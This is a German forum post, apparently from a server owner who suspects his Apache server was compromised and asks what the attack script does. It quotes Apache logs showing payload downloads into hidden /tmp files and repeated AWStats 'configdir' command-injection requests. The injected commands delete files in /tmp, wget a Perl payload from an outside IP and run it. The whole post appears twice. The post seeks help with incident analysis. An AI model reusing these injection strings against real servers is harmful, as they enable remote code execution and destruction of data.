Jacek
19.09.05, 09:04
Gestern ist mir aufgefallen, dass apache abgeschmiert war.
habe mir nichts weiter bei gedacht. Heute sehe ich die logs durch und siehe da,
was verdächtiges!
ich glaube ich bin gehackt worden!
Logs:
Apache errorlog:
[Sat Sep 17 23:17:37 2005] [error] [client 84.114.172.111] File does not exist: /htdocs
--03:04:35-- http://www.yogiplanet.com/linuxday.txt
=> `/tmp/.ayan'
Resolving www.yogiplanet.com... 205.234.147.232
Connecting to www.yogiplanet.com[205.234.147.232]:80... --03:04:45-- http://www.yogiplanet.com/linuxdaybot.txt
=> `/tmp/.ayan2'
Resolving www.yogiplanet.com... 205.234.147.232
Connecting to www.yogiplanet.com[205.234.147.232]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,677 [text/plain]
0K .......... ........ 100% 53.03 KB/s
03:05:36 (53.03 KB/s) - `/tmp/.ayan2' saved [18677/18677]
failed: Connection timed out.
Retrying.
--03:07:45-- http://www.yogiplanet.com/linuxday.txt
(try: 2) => `/tmp/.ayan'
Connecting to www.yogiplanet.com[205.234.147.232]:80... failed: Connection timed out.
Retrying.
--03:10:56-- http://www.yogiplanet.com/linuxday.txt
(try: 3) => `/tmp/.ayan'
Connecting to www.yogiplanet.com[205.234.147.232]:80... failed: Connection timed out.
Retrying.
--03:14:08-- http://www.yogiplanet.com/linuxday.txt
(try: 4) => `/tmp/.ayan'
Connecting to www.yogiplanet.com[205.234.147.232]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,154 [text/plain]
0K ... 100% 27.29 KB/s
03:14:12 (27.29 KB/s) - `/tmp/.ayan' saved [3154/3154]
[Sun Sep 18 04:02:02 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/awstats.pl
[Sun Sep 18 04:02:03 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/cgi-bin
[Sun Sep 18 04:02:04 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/awstats
[Sun Sep 18 04:02:08 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/awstats.pl
[Sun Sep 18 04:02:08 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/stats
[Sun Sep 18 04:02:09 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/stats
[Sun Sep 18 04:02:10 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/stats
Apache accesslog:
xxxxx 203.114.64.241 - - [18/Sep/2005:04:02:02 +0200] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.1
38/Skins/de/viewde;perl%20icet;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
xxxxx 203.114.64.241 - - [18/Sep/2005:04:02:03 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.5
3.220.138/.it/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
xxxxx 203.114.64.241 - - [18/Sep/2005:04:02:04 +0200] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.5
3.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
xxxxxx 203.114.64.241 - - [18/Sep/2005:04:02:08 +0200] "GET /awstats.pl/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://8
0.53.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
ns1.wm-solingen.de 203.114.64.241 - - [18/Sep/2005:04:02:08 +0200] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.
220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
xxxxxxx 203.114.64.241 - - [18/Sep/2005:04:02:09 +0200] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http:
//80.53.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
xxxxx 203.114.64.241 - - [18/Sep/2005:04:02:10 +0200] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http:
//80.53.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Kann einer genau sagen was dieses script macht?
MfG
Thomas
habe mir nichts weiter bei gedacht. Heute sehe ich die logs durch und siehe da,
was verdächtiges!
ich glaube ich bin gehackt worden!
Logs:
Apache errorlog:
[Sat Sep 17 23:17:37 2005] [error] [client 84.114.172.111] File does not exist: /htdocs
--03:04:35-- http://www.yogiplanet.com/linuxday.txt
=> `/tmp/.ayan'
Resolving www.yogiplanet.com... 205.234.147.232
Connecting to www.yogiplanet.com[205.234.147.232]:80... --03:04:45-- http://www.yogiplanet.com/linuxdaybot.txt
=> `/tmp/.ayan2'
Resolving www.yogiplanet.com... 205.234.147.232
Connecting to www.yogiplanet.com[205.234.147.232]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,677 [text/plain]
0K .......... ........ 100% 53.03 KB/s
03:05:36 (53.03 KB/s) - `/tmp/.ayan2' saved [18677/18677]
failed: Connection timed out.
Retrying.
--03:07:45-- http://www.yogiplanet.com/linuxday.txt
(try: 2) => `/tmp/.ayan'
Connecting to www.yogiplanet.com[205.234.147.232]:80... failed: Connection timed out.
Retrying.
--03:10:56-- http://www.yogiplanet.com/linuxday.txt
(try: 3) => `/tmp/.ayan'
Connecting to www.yogiplanet.com[205.234.147.232]:80... failed: Connection timed out.
Retrying.
--03:14:08-- http://www.yogiplanet.com/linuxday.txt
(try: 4) => `/tmp/.ayan'
Connecting to www.yogiplanet.com[205.234.147.232]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,154 [text/plain]
0K ... 100% 27.29 KB/s
03:14:12 (27.29 KB/s) - `/tmp/.ayan' saved [3154/3154]
[Sun Sep 18 04:02:02 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/awstats.pl
[Sun Sep 18 04:02:03 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/cgi-bin
[Sun Sep 18 04:02:04 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/awstats
[Sun Sep 18 04:02:08 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/awstats.pl
[Sun Sep 18 04:02:08 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/stats
[Sun Sep 18 04:02:09 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/stats
[Sun Sep 18 04:02:10 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/stats
Apache accesslog:
xxxxx 203.114.64.241 - - [18/Sep/2005:04:02:02 +0200] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.1
38/Skins/de/viewde;perl%20icet;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
xxxxx 203.114.64.241 - - [18/Sep/2005:04:02:03 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.5
3.220.138/.it/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
xxxxx 203.114.64.241 - - [18/Sep/2005:04:02:04 +0200] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.5
3.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
xxxxxx 203.114.64.241 - - [18/Sep/2005:04:02:08 +0200] "GET /awstats.pl/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://8
0.53.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
ns1.wm-solingen.de 203.114.64.241 - - [18/Sep/2005:04:02:08 +0200] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.
220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
xxxxxxx 203.114.64.241 - - [18/Sep/2005:04:02:09 +0200] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http:
//80.53.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
xxxxx 203.114.64.241 - - [18/Sep/2005:04:02:10 +0200] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http:
//80.53.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Kann einer genau sagen was dieses script macht?
MfG
Thomas